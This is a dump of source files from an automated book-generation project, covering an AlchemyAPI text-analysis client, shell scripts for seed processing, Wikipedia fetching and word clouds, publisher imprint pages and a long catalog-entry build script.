URLGetTextSentiment(self, url, baseParams=None):\n self.CheckURL(url)\n if 
baseParams == None:\n baseParams = AlchemyAPI_Params()\n baseParams.setUrl(url)\n return self.GetRequest(\"URLGetTextSentiment\", \"url\", baseParams)\n def HTMLGetTextSentiment(self, html, url, baseParams=None):\n self.CheckHTML(html, url)\n if baseParams == None:\n baseParams = AlchemyAPI_Params()\n baseParams.setUrl(url)\n baseParams.setHtml(html)\n return self.PostRequest(\"HTMLGetTextSentiment\", \"html\", baseParams)\n def TextGetTextSentiment(self, text, baseParams=None):\n self.CheckText(text)\n if baseParams == None:\n baseParams = AlchemyAPI_Params()\n baseParams.setText(text)\n return self.PostRequest(\"TextGetTextSentiment\", \"text\", baseParams)\n def URLGetTargetedSentiment(self, url, target, targetedSentimentParams=None):\n self.CheckURL(url)\n if targetedSentimentParams == None:\n targetedSentimentParams = AlchemyAPI_TargetedSentimentParams()\n targetedSentimentParams.setUrl(url)\n targetedSentimentParams.setTarget(target)\n return self.GetRequest(\"URLGetTargetedSentiment\", \"url\", targetedSentimentParams)\n def HTMLGetTargetedSentiment(self, html, url, target, targetedSentimentParams=None):\n self.CheckHTML(html, url)\n if targetedSentimentParams == None:\n targetedSentimentParams = AlchemyAPI_TargetedSentimentParams()\n targetedSentimentParams.setUrl(url)\n targetedSentimentParams.setHtml(html)\n targetedSentimentParams.setTarget(target)\n return self.PostRequest(\"HTMLGetTargetedSentiment\", \"html\", targetedSentimentParams)\n def TextGetTargetedSentiment(self, text, target, targetedSentimentParams=None):\n self.CheckText(text)\n if targetedSentimentParams == None:\n targetedSentimentParams = AlchemyAPI_TargetedSentimentParams()\n targetedSentimentParams.setText(text)\n targetedSentimentParams.setTarget(target)\n return self.PostRequest(\"TextGetTargetedSentiment\", \"text\", targetedSentimentParams)\n def URLGetRelations(self, url, relationParams=None):\n self.CheckURL(url)\n if relationParams == None:\n relationParams = AlchemyAPI_RelationParams()\n relationParams.setUrl(url)\n return self.GetRequest(\"URLGetRelations\", \"url\", relationParams)\n def HTMLGetRelations(self, html, url, relationParams=None):\n self.CheckHTML(html, url)\n if relationParams == None:\n relationParams = AlchemyAPI_RelationParams()\n relationParams.setUrl(url)\n relationParams.setHtml(html)\n return self.PostRequest(\"HTMLGetRelations\", \"html\", relationParams)\n def TextGetRelations(self, text, relationParams=None):\n self.CheckText(text)\n if relationParams == None:\n relationParams = AlchemyAPI_RelationParams()\n relationParams.setText(text)\n return self.PostRequest(\"TextGetRelations\", \"text\", relationParams)\n def URLGetAuthor(self, url, baseParams=None):\n self.CheckURL(url)\n if baseParams == None:\n baseParams = AlchemyAPI_Params()\n baseParams.setUrl(url)\n return self.GetRequest(\"URLGetAuthor\", \"url\", baseParams)\n def HTMLGetAuthor(self, html, url, baseParams=None):\n self.CheckHTML(html, url)\n if baseParams == None:\n baseParams = AlchemyAPI_Params()\n baseParams.setUrl(url)\n baseParams.setHtml(html)\n return self.PostRequest(\"HTMLGetAuthor\", \"html\", baseParams)\n def CheckText(self, text):\n if len(self._apiKey) < 5:\n raise Exception('Please load an API key.')\n if len(text) < 5:\n raise Exception('Please specify some text to analyze.')\n def CheckHTML(self, html, url):\n if len(self._apiKey) < 5:\n raise Exception('Please load an API key.')\n if len(html) < 10:\n raise Exception('Please specify a HTML document to analyze.')\n if len(url) < 10:\n raise 
Exception('Please specify a URL to analyze.')\n def CheckURL(self, url):\n if len(self._apiKey) < 5:\n raise Exception('Please load an API key.')\n if len(url) < 10:\n raise Exception('Please specify a URL to analyze.')\n def PostRequest(self, apiCall, apiPrefix, paramObject):\n endpoint = 'http://' + self._hostPrefix + '.alchemyapi.com/calls/' + apiPrefix + '/' + apiCall\n argText = 'apikey=' + self._apiKey + paramObject.getParameterString()\n handle = urllib.request.urlopen(endpoint, argText)\n result = handle.read()\n handle.close()\n xpathQuery = './/status'\n nodes = etree.fromstring(result).find(xpathQuery)\n if nodes.text != \"OK\":\n raise Exception('Error making API call.')\n return result\n def GetRequest(self, apiCall, apiPrefix, paramObject):\n endpoint = 'http://' + self._hostPrefix + '.alchemyapi.com/calls/' + apiPrefix + '/' + apiCall\n endpoint += '?apikey=' + self._apiKey + paramObject.getParameterString()\n handle = urllib.request.urlopen(endpoint)\n result = handle.read()\n handle.close()\n xpathQuery = './/status'\n nodes = etree.fromstring(result).find(xpathQuery)\n if nodes.text != \"OK\":\n raise Exception('Error making API call.')\n return result\n" }, { "alpha_fraction": 0.7099767923355103, "alphanum_fraction": 0.7146171927452087, "avg_line_length": 38.181819915771484, "blob_id": "75ab3ca0dd313f243822205ce2907c8cae7bfdab", "content_id": "ac4b54339a1e05d088840a4bc03a031e5308c997", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 431, "license_type": "permissive", "max_line_length": 147, "num_lines": 11, "path": "/scripts/find-unique-seeds.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# assumes that this is located in scriptpath home\n\ncat $LOCAL_DATA\"seeds/history/seed-history.csv\" | cut -d, -f1 | sed 's/[ \\t]*$//' | sort | uniq > $LOCAL_DATA\"seeds/history/uniq.seed-history.csv\"\n\n# Concatenates the list files,\n# removes duplicate lines,\n# and finally writes the result to an output file.\necho \"sorted seed-history.csv and wrote to local-data/uniq.seed-history.csv\" | tee --append $sfb_log\nexit\n0\n" }, { "alpha_fraction": 0.47433459758758545, "alphanum_fraction": 0.5152091383934021, "avg_line_length": 42.79166793823242, "blob_id": "7a4ab039ed47b72b0cac526a04055a2a529db673", "content_id": "fe8feb8fc0ca9c39ce6b5cf422d481be848a2287", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1052, "license_type": "permissive", "max_line_length": 521, "num_lines": 24, "path": "/scripts/includes/fetch-links-as-array.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "\t# fetch the documents for this seed\n\necho 'processing fetch list' | tee --append $sfb_log\n\n\twhile IFS='\t' read title \n\t\tdo\t\n\t\t\t\n\t\techo \"title is \" $title\n\n\t\tsafetitle=$(echo $title | sed -e 's/%/%25/g' -e 's/ /%20/g' -e 's/!/%21/g' -e 's/\"/%22/g' -e 's/#/%23/g' -e 's/\\$/%24/g' -e 's/\\&/%26/g' -e 's/'\\''/%27/g' -e 's/(/%28/g' -e 's/)/%29/g' -e 's/\\*/%2a/g' -e 's/+/%2b/g' -e 's/,/%2c/g' -e 's/-/%2d/g' -e 's/\\./%2e/g' -e 's/\\//%2f/g' -e 's/:/%3a/g' -e 's/;/%3b/g' -e 's//%3e/g' -e 's/?/%3f/g' -e 's/@/%40/g' -e 's/\\[/%5b/g' -e 's/\\\\/%5c/g' -e 's/\\]/%5d/g' -e 's/\\^/%5e/g' -e 's/_/%5f/g' -e 's/`/%60/g' -e 's/{/%7b/g' -e 's/|/%7c/g' -e 's/}/%7d/g' -e 's/~/%7e/g' -e 's/;/_/g')\n\n\t\techo \"safetitle is \" 
$safetitle\n\n\n\t\tfetchurlbase=\"http://en.wikipedia.org/w/index.php?action=render&title=\"\n\t\techo \"fetchurlbase is\" $fetchurlbase | tee --append $sfb_log\n\t\tfetchurl=$fetchurlbase$safetitle\n\t\techo \"next to be fetched is\" $fetchurl | tee --append $sfb_log\n\t\tfetchurl+=(\"$fetchurl\")\n\t\t\n\t\n\tdone <fetch/$uuid/titles.txt\n\necho \"fetcharray is\" ${fetcharray[@]}\n" }, { "alpha_fraction": 0.8360277414321899, "alphanum_fraction": 0.8360277414321899, "avg_line_length": 143, "blob_id": "196b8ac453a5a2b7d6b2b75c077b61a50fd41eb6", "content_id": "d4f36def2ea99292c6ecd123d104acdf634da0fc", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 433, "license_type": "permissive", "max_line_length": 410, "num_lines": 3, "path": "/conf/jobprofiles/imprints/xmedialab/xmedialab_mission.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# About X Media Lab\n\nThe Internationally Acclaimed Digital Media Think-Tank and Creative Workshop X Media Lab is the internationally acclaimed creative industries event. X Media Lab creates a meeting place uniquely designed to assist companies and people in getting their own creative ideas successfully to market, through concept development, business matching, and direct access to world-class networks of creative professionals.\n\n" }, { "alpha_fraction": 0.673521876335144, "alphanum_fraction": 0.6992287635803223, "avg_line_length": 21.823530197143555, "blob_id": "8d1a684ebde8873e8b464c14cf9f7c49c648957f", "content_id": "8fd9b1d7e72bc2955146fb6df2cbfeaea37f95e7", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 389, "license_type": "permissive", "max_line_length": 181, "num_lines": 17, "path": "/scripts/bin/pdf2printwordcloud.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n. 
../conf/config.txt\n\nfor file in *.pdf\ndo\n# build print-size Word Cloud image\n\n\tpdf2txt $file > $file.txt\n\n\techo \"converted \"$file \"to txt\"\n\n\t$JAVA_BIN -jar $scriptpath\"lib/IBMcloud/ibm-word-cloud.jar\" -c $scriptpath\"lib/IBMcloud/examples/configuration.txt\" -w 2550 -h 3300 < $file.txt > $file\"printcloud.png\" 2> /dev/null\n\n\techo \"created print word cloud for \" $file\n\ndone\n\n" }, { "alpha_fraction": 0.6821862459182739, "alphanum_fraction": 0.6983805894851685, "avg_line_length": 23.700000762939453, "blob_id": "ac8c92bcede75030a849898bf452296575ff0b7b", "content_id": "2d66b58e2eda48c789c9e20e0b4849f133ccea68", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 494, "license_type": "permissive", "max_line_length": 71, "num_lines": 20, "path": "/scripts_python_3/bitcoin/fortune/pk21client.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nfrom two1.wallet import Wallet\nfrom two1.bitrequests import BitTransferRequests\n\n# set up bitrequest client for BitTransfer requests\nwallet = Wallet()\nrequests = BitTransferRequests(wallet)\n\n# server address\nserver_url = 'http://localhost:5000/'\n\ndef buy_fortune():\n\n url = server_url+'buy?payout_address={0}'\n response = requests.get(url=url.format(wallet.get_payout_address()))\n print((response.text))\n \nif __name__ == '__main__':\n buy_fortune()\n" }, { "alpha_fraction": 0.7168949842453003, "alphanum_fraction": 0.7945205569267273, "avg_line_length": 23.22222137451172, "blob_id": "b1c02b1936dc70bd68c4b8548e1d14117e0ffebc", "content_id": "1aa73dbb51513c9dafc20c9837dfbfc13990b92b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 219, "license_type": "permissive", "max_line_length": 85, "num_lines": 9, "path": "/conf/jobprofiles/imprints/nimble/nimblecopyrightpage.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Nimble Books LLC\n\[email protected]\n\n1521 Martha Avenue, Ann Arbor, Michigan, USA 48103\n\nFront & back matter copyright Nimble Books LLC 2014\n\nOriginal Works included copyright Nimble Books LLC 2014 per agreement with the author\n\n" }, { "alpha_fraction": 0.6722955107688904, "alphanum_fraction": 0.6869760751724243, "avg_line_length": 23.11121940612793, "blob_id": "c451005d20489ebb433d9070030ad6cc47524ad7", "content_id": "e90e6d014701c9ae23dbcfed374cea4cbd8f18f4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 24931, "license_type": "permissive", "max_line_length": 843, "num_lines": 1034, "path": "/scripts/bin/create-catalog-entry.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\necho \"CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\"\n\nTEXTDOMAIN=SFB # required for bash language awareness\necho $\"hello, world, I am speaking\" $LANG\n\nif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\techo \"config file not found, creating /home/<user>/.pagekicker, you need to put config file there\"\n\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\techo \"exiting\"\n\texit 1\nelse\n\t. 
\"$HOME\"/.pagekicker/config.txt\n\techo \"read config file from $HOME\"\"/.pagekicker/config.txt\"\nfi\n\n\necho \"software version number is\" $SFB_VERSION\n\necho \"sfb_log is\" $sfb_log\n\necho \"completed reading config file and beginning logging at\" `date +'%m/%d/%y%n %H:%M:%S'`\n#echo $PATH\n# echo \"I am\" $(whoami)\nstarttime=$(( `date +%s` ))\n\nsku=`tail -1 < \"$LOCAL_DATA\"\"SKUs/sku_list\"`\necho \"sku\" $sku\n\n. includes/set-variables.sh\n\nwhile :\ndo\ncase $1 in\n--help | -\\?)\necho \"for help review source code for now\"\nexit 0 # This is not an error, the user requested help, so do not exit status 1.\n;;\n--xmlfilename)\nxmlfilename=$2\nshift 2\n;;\n--xmlfilename=*)\nxmlfilename=${1#*=}\nshift\n;;\n--passuuid)\npassuuid=$2\nshift 2\n;;\n--passuuid=*)\npassuuid=${1#*=}\nshift\n;;\n--seedfile)\nseedfile=$2\nshift 2\n;;\n--seedfile=*)\nseedfile=${1#*=}\nshift\n;;\n--seedsviacli)\nseedsviacli=$2\nshift 2\n;;\n--seedsviacli=*)\nseedsviacli=${1#*=}\nshift\n;;\n--pdfdir)\npdfdir=$2\nshift 2\n;;\n--pdfdir*)\npdfdir=${1#*=}\nshift\n;;\n--pdf_infile)\npdf_infile=$2\nshift 2\n;;\n--pdf_infile*)\npdf_infile=${1#*=}\nshift\n;;\n--txt_infile)\ntxt_infile=$2\nshift 2\n;;\n--txt_infile*)\ntxt_infile=${1#*=}\nshift\n;;\n--url_infile)\nurl_infile=$2\nshift 2\n;;\n--url_infile*)\nurl_infile=${1#*=}\nshift\n;;\n--csv_infile)\ncsv_infile=$2\nshift 2\n;;\n--csv_infile=*)\ncsv_infile=${1#*=}\nshift\n;;\n--booktype)\nbooktype=$2\nshift 2\n;;\n--booktype=*)\nbooktype=${1#*=}\nshift\n;;\n--booktitle)\nbooktitle=$2\nshift 2\n;;\n--booktitle=*)\nbooktitle=${1#*=}\nshift\n;;\n--buildtarget)\nbuildtarget=$2\nshift 2\n;;\n--buildtarget=*)\nbuildtarget=${1#*=}\nshift\n;;\n--singleseed)\nsingleseed=$2\nshift 2\n;;\n--singleseed=*)\nsingleseed=${1#*=}\nshift\n;;\n--truncate_seed)\ntruncate_seed=$2\nshift 2\n;;\n--truncate_seed=*)\ntruncate_seed=${1#*=}\nshift\n;;\n--builder)\nbuilder=$2\nshift 2\n;;\n--builder=*)\nbuilder=${1#*=}\nshift\n;;\n--yourname)\nyourname=$2\nshift 2\n;;\n--yourname=*)\nyourname=${1#*=}\nshift\n;;\n--mailtoadmin)\nmailtoadmin=$2\nshift 2\n;;\n--mailtoadmin=*)\nmailtoadmin=${1#*=}\nshift\n;;\n--storecode)\nstorecode=$2\nshift 2\n;;\n--storecode=*)\nstorecode=${1#*=}\nshift\n;;\n--websites)\nwebsites=$2\nshift 2\n;;\n--websites=*)\nwebsites=${1#*=}\nshift\n;;\n--attribute_set)\nattribute_set=$2\nshift 2\n;;\n--attribute_set=*)\nattribute_set=${1#*=}\nshift\n;;\n--type)\ntype=$2\nshift 2\n;;\n--type=*)\ntype=${1#*=}\nshift\n;;\n--categories)\ncategories=$2\nshift 2\n;;\n--categories=*)\ncategories=${1#*=}\nshift\n;;\n--customerid)\ncustomerid=$2\nshift 2\n;;\n--customerid=*)\ncustomerid=${1#*=}\nshift\n;;\n--status)\nstatus=$2\nshift 2\n;;\n--status=*)\nstatus=${1#*=}\nshift\n;;\n--visibility)\nvisibility=$2\nshift 2\n;;\n--visibility=*)\nvisibility=${1#*=}\nshift\n;;\n--featured)\nfeatured=$2\nshift 2\n;;\n--featured=*)\nfeatured=${1#*=}\nshift\n;;\n--special_to_buffer)\nspecial_to_buffer=$2\nshift 2\n;;\n--special_to_buffer=*)\nspecial_to_buffer=${1#*=}\nshift\n;;\n--storeids)\nstoreids=$2\nshift 2\n;;\n--storeids=*)\nstoreids=${1#*=}\nshift\n;;\n--environment)\nenvironment=$2\nshift 2\n;;\n--environment=*)\nenvironment=${1#*=}\nshift\n;;\n--booktitle)\nbooktitle=$2\nshift 2\n;;\n--booktitle=*)\nbooktitle=${1#*=}\nshift\n;;\n--exemplar_file)\nexemplar_file=$2\nshift 2\n;;\n--exemplar_file=*)\nexemplar_file=${1#*=}\nshift\n;;\n--jobprofilename)\njobprofilename=$2\nshift 2\n;;\n--jobprofilename=*)\njobprofilename=${1#*=}\nshift\n;;\n--wikilang)\nwikilang=$2\nshift 
2\n;;\n--wikilang=*)\nwikilang=${1#*=}\nshift\n;;\n--covercolor)\ncovercolor=$2\nshift 2\n;;\n--covercolor=*)\ncovercolor=${1#*=}\nshift\n;;\n--coverfont)\ncoverfont=$2\nshift 2\n;;\n--coverfont=*)\ncoverfont=${1#*=}\nshift\n;;\n--revenue_share)\nrevenue_share=$2\nshift 2\n;;\n--revenue_share=*)\nrevenue_share=${1#*=}\nshift\n;;\n--tldr)\ntldr=$2\nshift 2\n;;\n--tldr=*)\ntldr=${1#*=}\nshift\n;;\n--format)\nformat=$2\nshift 2\n;;\n--format=*)\nformat=${1#*=}\nshift\n;;\n--yourname)\nyourname=$2\nshift 2\n;;\n--yourname=*)\nyourname=${1#*=}\nshift\n;;\n--book_description)\nbook_description=$2\nshift 2\n;;\n--book_description=*)\nbook_description=${1#*=}\nshift\n;;\n--seedphrases)\nseedphrases=$2\nshift 2\n;;\n--seedphrases=*)\nseedphrases=${1#*=}\nshift\n;;\n--import)\nimport=$2\nshift 2\n;;\n--import=*)\nimport=${1#*=}\nshift\n;;\n--batch_uuid)\nbatch_uuid=$2\nshift 2\n;;\n--batch_uuid=*)\nbatch_uuid=${1#*=}\nshift\n;;\n--editedby)\neditedby=$2\nshift 2\n;;\n--editedby=*)\neditedby=${1#*=}\nshift\n;;\n--subtitle)\nsubtitle=$2\nshift 2\n;;\n--subtitle=*)\nsubtitle=${1#*=}\nshift\n;;\n--add_corpora)\nadd_corpora=$2\nshift 2\n;;\n--add_corpora=*)\nadd_corpora=${1#*=}\nshift\n;;\n--analyze_url)\nanalyze_url=$2\nshift 2\n;;\n--analyze_url=*)\nanalyze_url=${1#*=}\nshift\n;;\n--dontcleanupseeds)\ndontcleanupseeds=$2\nshift 2\n;;\n--dontcleanupseeds=*)\ndontcleanupseeds=${1#*=}\nshift\n;;\n--top_q)\ntop_q=$2\nshift 2\n;;\n--top_q=*)\ntop_q=${1#*=}\nshift\n;;\n--summary)\nsummary=$2\nshift 2\n;;\n--summary=*)\nsummary=${1#*=}\nshift\n;;\n--imprint)\nimprint=$2\nshift 2\n;;\n--imprint=*)\nimprint=${1#*=}\nshift\n;;\n--pricing)\npricing=$2\nshift 2\n;;\n--pricing=*)\npricing=${1#*=}\nshift\n;;\n--add_this_content)\nadd_this_content=$2\nshift 2\n;;\n--add_this_content=*)\nadd_this_content=${1#*=}\nshift\n;;\n--add_this_content_part_name)\nadd_this_content_part_name=$2\nshift 2\n;;\n--add_this_content_part_name=*)\nadd_this_content_part_name=${1#*=}\nshift\n;;\n--add_dat_run)\nadd_dat_run=$2\nshift 2\n;;\n--add_dat_run=*)\nadd_dat_run=${1#*=}\nshift\n;;\n--expand_seeds_to_pages)\nexpand_seeds_to_pages=$2\nshift 2\n;;\n--expand_seeds_to_pages=*)\nexpand_seeds_to_pages=${1#*=}\nshift\n;;\n--skyscraper)\nskyscraper=$2\nshift 2\n;;\n--skyscraper=*)\nskyscraper=${1#*=}\nshift\n;;\n--twitter_announcement)\ntwitter_announcement=$2\nshift 2\n;;\n--twitter_announcement=*)\ntwitter_announcement=${1#*=}\nshift\n;;\n --) # End of all options\n shift\n break\n ;;\n -*)\n echo \"WARN: Unknown option (ignored): $1\" >&2\n shift\n ;;\n *) # no more options. Stop while loop\n break\n ;;\nesac\ndone\n\n# Suppose some options are required. Check that we got them.\n\necho \"PYTHON_BIN is $PYTHON_BIN\"\n\"$PYTHON_BIN\" --version\n\nif [ ! 
\"$passuuid\" ] ; then\n\techo \"creating uuid\"\n\tuuid=$(\"$PYTHON_BIN\" -c 'import uuid; print(uuid.uuid1())')\n\techo \"uuid is\" $uuid | tee --append $xform_log\n\nelse\n\tuuid=\"$passuuid\"\n\techo \"received uuid \" $uuid\n\nfi\n\n# create directories I will need\n\nmkdir -p -m 777 \"$TMPDIR\"\nmkdir -p -m 777 \"$TMPDIR\"$uuid\nmkdir -p -m 777 \"$TMPDIR\"$uuid/wiki\nmkdir -p -m 777 \"$TMPDIR\"$uuid/user\nmkdir -p -m 777 \"$TMPDIR\"$uuid/flickr\nmkdir -p -m 777 \"$TMPDIR\"$uuid/fetch\nmkdir -p -m 777 \"$TMPDIR\"$uuid/seeds\nmkdir -p -m 777 \"$TMPDIR\"$uuid/images\nmkdir -p -m 777 \"$TMPDIR\"$uuid/mail\nmkdir -p -m 755 \"$TMPDIR\"$uuid/cover\nmkdir -p -m 755 \"$TMPDIR\"$uuid/twitter\nmkdir -p -m 755 $mediatargetpath$uuid\nmkdir -p -m 755 $metadatatargetpath$uuid\n\ncase \"$format\" in\nxml)\n\techo \"getting metadata from xml file\"\n\n\txmlbasepath=\"$WEBFORMSXML_HOME\"\n\n\techo \"xmlbasepath is\" $xmlbasepath\n\techo \"xmlfilename is\" $xmlfilename\n\txmlfilename=$xmlbasepath/$xmlfilename\n\n\tbooktitle=$(xmlstarlet sel -t -v \"/item/booktitle\" \"$xmlfilename\")\n\tbooktype=$(xmlstarlet sel -t -v \"/item/booktype\" \"$xmlfilename\")\n\tBISAC_code=$(xmlstarlet sel -t -v \"/item/BISAC_code\" \"$xmlfilename\")\n\tcustomer_email=$(xmlstarlet sel -t -v \"/item/customer_email\" \"$xmlfilename\")\n\tenvironment=$(xmlstarlet sel -t -v \"/item/environment\" \"$xmlfilename\")\n\texemplar_file=$(xmlstarlet sel -t -v \"/item/exemplar_file\" \"$xmlfilename\")\n\tjobprofilename=$(xmlstarlet sel -t -v \"/item/jobprofilename\" \"$xmlfilename\")\n\twikilang=$(xmlstarlet sel -t -v \"/item/wikilang\" \"$xmlfilename\")\n\trevenue_share=$(xmlstarlet sel -t -v \"/item/revenue_share\" \"$xmlfilename\")\n\tsources=$(xmlstarlet sel -t -v \"/item/sources\" \"$xmlfilename\")\n\tsubmissionid=$(xmlstarlet sel -t -v \"/item/id\" \"$xmlfilename\")\n\ttldr=$(xmlstarlet sel -t -v \"/item/tldr\" \"$xmlfilename\")\n\tseedphrases=$(xmlstarlet sel -t -v \"/item/seed-phrases\" \"$xmlfilename\")\n\tbook_description=$(xmlstarlet sel -t -v \"/item/book-description\" \"$xmlfilename\")\n\tcoverfont=$(xmlstarlet sel -t -v \"/item/coverfont\" \"$xmlfilename\")\n\tcovercolor=$(xmlstarlet sel -t -v \"/item/covercolor\" \"$xmlfilename\")\n\tyourname=$(xmlstarlet sel -t -v \"/item/yourname\" \"$xmlfilename\")\n\tcustomername=$(xmlstarlet sel -t -v \"/item/customername\" \"$xmlfilename\")\n\tcustomerid=$(xmlstarlet sel -t -v \"/item/customer_id\" \"$xmlfilename\")\n\tadd_this_content=$(xmlstarlet sel -t -v \"/item/add_this_content\" \"$xmlfilename\")\n\techo \"environment is\" $environment | tee --append $xform_log\n\techo \"jobprofilename is\" $jobprofilename | tee --append $xform_log\n\techo \"exemplar_file is\" $exemplar_file | tee --append $xform_log\n\n\techo -n \"$seedphrases\" > \"$TMPDIR\"$uuid/seeds/seedphrases\n\n\tcp $WEBFORMSHOME$submissionid/$exemplar_filedir_code/*/$exemplar_file \"$TMPDIR\"$uuid/$exemplar_file\n;;\ncsv)\n\techo \"getting metadata from csv\"\n\tcp $seedfile \"$TMPDIR\"$uuid/seeds/seedphrases\n;;\n*)\n\techo \"getting path to seedfile from command line\"\n\tif [ -z \"$seedfile\" ] ; then\n\t\techo \"no seedfile provided\"\n\t\t\tif [ -z \"$singleseed\" ] ; then\n\t\t\t\techo \"no singleseed provided\"\n\t\t\t\t\tif [ -z \"$seedsviacli\" ] ; then\n\t\t\t\t\t\techo \"no seedsviacli provided, exiting\"\n\t\t\t\t\telse\n\t\t\t\t\t\techo \"$seedsviacli\" | sed -e 's/;/\\n/' > \"$TMPDIR\"$uuid/seeds/seedphrases\n\t\t\t\t\tfi\n\t\t\telse\n\t\t\t\tseed=\"$singleseed\"\n\t\t\t\techo \"$singleseed\" > 
\"$TMPDIR\"$uuid/seeds/seedphrases\n\t\t\tfi\n\telse\n\t echo \"path to seedfile was $seedfile\"\n\t\tcp $seedfile \"$TMPDIR\"$uuid/seeds/seedphrases\n\tfi\n;;\nesac\n\n\n# assign wikilocale & stopfile based on LANG\n\n# deprecated assigning wikilocale via environment $LANG\n\n# wikilocale=$(grep $LANG locale/wiki-lookup.csv | cut -d, -f2)\n\n# kluge for backwards compatibility\nif [ \"$wikilang\" = \"en_US.UTF-8\" ] ; then\n\twikilang=\"en\"\nelse\n\techo \"wikilang in wikipedia domain format\"\nfi\n\nwikilocale=$wikilang\n\nif [ \"$wikilang\" = \"en\" ] ; then\n\tstopfile=\"$scriptpath\"\"lib/IBMcloud/examples/pk-stopwords.txt\"\nelif [ \"$wikilang\" = \"sv\" ] ; then\n\tstopfile=\"$scriptpath\"\"locale/stopwords/sv\"\nelse\n\tstopfile=\"$scriptpath\"\"lib/IBMcloud/examples/pk-stopwords.txt\"\nfi\n\necho \"wikilocale now is \"$wikilang\n\nif [ -z \"$imprint\" ]; then\n\timprint=\"default\"\n\t. $confdir\"jobprofiles/imprints/\"$imprint\"/\"$fimpr\".imprint\"\nelse\n\t. $confdir\"jobprofiles/imprints/\"$imprint\"/\"$imprint\".imprint\"\n echo \"imprint is $imprint\"\nfi\n\nif [ -z \"$jobprofilename\" ]; then\n\tjobprofilename=\"default\"\n\t. \"$confdir\"jobprofiles/robots/\"$jobprofilename\".jobprofile\nelse\n\t. \"$confdir\"jobprofiles/robots/\"$jobprofilename\".jobprofile\nfi\n\nhuman_author=\"$editedby\"\n\n# APIs\n\n. includes/api-manager.sh\n\n# echo $scriptpath \"is scriptpath\"\n\necho \"Assembling infiles and assets\"\n\necho -n \"$book_description\" > \"$TMPDIR\"$uuid/book-description.txt\necho -n \"$tldr\" > \"$TMPDIR\"$uuid/tldr.txt\necho \"analyze_url is $analyze_url\"\nif [ -z ${analyze_url+x} ] ; then\n\techo \"$analyze_url not set as analyze_url\"\nelse\n\tif [[ $analyze_url =~ $httpvalidate ]] ; then\n\t\techo \"$analyze_url is valid URI\"\n\t\techo \"analyze_url is set as $analyze_url\"\n\t\t\"$PANDOC_BIN\" -s -r html \"$analyze_url\" -o \"$TMPDIR\"$uuid\"/webpage.md\"\n\t\t\"$PYTHON27_BIN\" bin/nerv3.py \"$TMPDIR\"$uuid\"/webpage.md\" \"$TMPDIR\"$uuid\"/webseeds\" \"$uuid\"\n\t\techo \"seeds extracted from analyze_url\"\n\t\t head -n \"$top_q\" \"$TMPDIR\"$uuid\"/webseeds\" | sed '/^\\s*$/d' > \"$TMPDIR\"$uuid\"/webseeds.top_q\"\n\t\tcat \"$TMPDIR\"$uuid\"/webseeds.top_q\" > \"$TMPDIR\"$uuid\"/webseeds\"\n\t\tcomm -2 -3 <(sort \"$TMPDIR\"$uuid\"/webseeds\") <(sort \"locale/stopwords/webstopwords.en\") >> \"$TMPDIR\"$uuid/seeds/seedphrases\n\telse\n\t\techo \"invalid URI, analyze_url not added\"\n\tfi\nfi\n\n# echo \"checking for naughty words\"\n\nexport uuid\n\"$scriptpath\"bin/screen-naughty-seeds.sh \"$TMPDIR$uuid/seeds/seedphrases\" $uuid\nnaughtyresult=$?\n\nif [ $naughtyresult -eq \"0\" ] ; then\n\techo \"naughty seeds checked\"\nelse\n\techo \"Exited with problem in screen-naughty-seeds.sh\"\n \texit 0\nfi\n\n# echo \"checking for human error on form submission\"\n\n#if bin/screen-human-error.sh \"$TMPDIR\"$uuid/seeds/seedphrases ; then\n# echo \"Exited with zero value\"\n#else\n# echo \"Exited with non zero\"\n# exit 0\n#fi\n\necho \"seedfile is\" $seedfile\n\n# screen for zero value seed file\n\n\ncat \"$TMPDIR$uuid/seeds/seedphrases\" | uniq | sort | sed -e '/^$/d' -e '/^[0-9#@]/d' > \"$TMPDIR$uuid/seeds/sorted.seedfile\"\ncat \"$TMPDIR$uuid/seeds/sorted.seedfile\" > \"$LOCAL_DATA\"seeds/history/\"$sku\".seedphrases\n\n#expand seeds to valid wiki pages\n\nif [ \"$expand_seeds_to_pages\" = \"yes\" ] ; then\n\t\techo \"$expand_seeds_to_pages\"\n\t\t\"$PYTHON27_BIN\" bin/wiki_seeds_2_pages.py --infile \"$TMPDIR\"$uuid\"/seeds/sorted.seedfile\" --pagehits 
